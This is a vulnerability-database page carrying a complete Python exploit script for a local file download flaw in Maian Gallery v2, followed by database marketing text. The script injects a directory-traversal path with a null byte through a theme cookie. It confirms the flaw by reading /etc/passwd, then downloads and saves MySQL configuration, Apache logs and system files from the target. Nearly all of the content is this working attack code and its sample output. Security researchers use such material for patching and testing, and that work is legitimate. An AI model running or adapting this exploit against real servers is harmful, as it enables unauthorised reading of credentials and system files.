Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Maian Gallery 2 - Local File Download Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 13 Views

Maian Gallery 2 - Local File Download Vulnerability. Vulnerability in Maian Gallery v2 allows a local file download through file_get_contents(). Exploitable on Ubuntu Linux 2.6.32 with PHP v5.3.2. Found files include access.log, my.cnf, and passwd

Code

                                                #!/usr/bin/python
#
# This vulnerability uses file_get_contents()
# so we have some limitations, we cant execute PHP
# and we cant read files that the web server will
# interpret such as PHP, conf etc
#
# tested on: Ubuntu Linux 2.6.32 with php v5.3.2
# register_globals = Off
#
# PRIVATE 0DAY - code by mr_me
# Vulnerability found by my special PHP friend and is now patched, hence this PoC ;)
# 
# mr_me@1337:~$ sudo ~/maian.py -p 127.0.0.1:8080 -t localhost -d /maian_gallery/ -o /home/mr_me/
#
#		| ------------------------------------------------------------- |
#		|        -= Maian Gallery v2 Local File Download Exploit =      |
#		| ---------------------------[ by mr_me ]---------------------- |
#
# (+) Checking target @: http://localhost/maian_gallery/
#
# (+) Testing Proxy...
# (+) Proxy working! 127.0.0.1:8080
# (+) Building Handler..
# (+) File download is working!
# (+) Looking for remote configuration files and saving them to /home/mr_me/
# (+) Found file on remote host @ /var/log/apache2/access.log
# (+) Found file on remote host @ /etc/mysql/my.cnf
# (+) Found file on remote host @ /etc/passwd
# (!) Done!
#

import sys, os, httplib, socket, urllib2, re
from optparse import OptionParser

usage= "./%prog [<options>] -t [target] -d [directory] -o [output dir to save files]"
usage += "\nExample : ./%prog -p 203.167.876.54:80 -t localhost -d maian_gallery/"
parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
                  help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
                  help="The target server")
parser.add_option("-d", type="string", action="store", dest="directory",
                  help="The dir path to maian gallery")
parser.add_option("-o", type="string", action="store", dest="outputDir",
                  help="Output dir to save all files")
(options, args) = parser.parse_args()

def banner():
    print "\n\t\t| ------------------------------------------------------------ |"
    print "\t\t|        -= Maian Gallery v2 Local File Download Exploit =-    |"
    print "\t\t| ---------------------------[ by mr_me ]--------------------- |\n"

if len(sys.argv) < 4:
	banner()
        parser.print_help()
        sys.exit(1)

def getProxy():
	try:
        	pr = httplib.HTTPConnection(options.proxy)
        	pr.connect()
        	proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
	except(socket.timeout):
                print "\n(-) Proxy Timed Out"
                sys.exit(1)
	except(),msg:
                print "\n(-) Proxy Failed"
                sys.exit(1)
	return proxy_handler

dltest = "etc/passwd"
dotDotSlash = '../../../../../../../../../'
findAllFiles = ['/var/log/apache2/access_log', '/var/log/apache2/access.log', 
'/etc/mysql/my.cnf', '/etc/my.cnf', '/etc/passwd', '/etc/apache2/httpd.conf']

if options.target[0:6] != 'http://':
	options.target = "http://" + options.target

def getRequest(localFile):
	if options.proxy:
		try:
        		proxyfier = urllib2.build_opener(getProxy())
        		proxyfier.addheaders = [('Cookie', 'PHPSESSID=d0tcacup9euftbsb9kd7r55db3; mgallery_theme_cookie='+dotDotSlash+localFile+"%00")]
        		check = proxyfier.open(options.target+options.directory).read()
		except urllib2.HTTPError, error:
                        check = error.read()
	else:
		try:
        		req = urllib2.Request(options.target+options.directory)
        		req.add_header('Cookie', 'PHPSESSID=d0tcacup9euftbsb9kd7r55db3; mgallery_theme_cookie='+dotDotSlash+localFile+"%00")
        		check = urllib2.urlopen(req).read()
		except urllib2.HTTPError, error:
			check = error.read()
	return check

banner()

print "(+) Checking target @: %s" % (options.target+options.directory)
if options.proxy:
	print "\n(+) Testing Proxy..."
	print "(+) Proxy working! %s" % (options.proxy)
	print "(+) Building Handler.."
check = getRequest(dltest)
if re.findall("root:x:", check):
	print "(+) File download is working!"
	print "(+) Looking for remote configuration files and saving them to %s" % (options.outputDir)
	for f in findAllFiles:
		checkFile = getRequest(f)
		if len(checkFile) > 0:
			print "(+) Found file on remote host @ %s" % (f)
			filenames = f.split('/') 
			try:
				ff = open(options.outputDir+filenames[len(filenames)-1]+'.txt','w')
				ff.write(checkFile)
				ff.close()
			except:
				print "(-) Cannot save remote files locally.. check your path"
	print "(!) Done!\n"			
else:
    	print "(-) Target not vulnerable to the file download vulnerability"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
maian gallerylocal filedownload vulnerabilityubuntu linuxphpfile_get_contentsexploitaccess logmy.cnfpasswd
13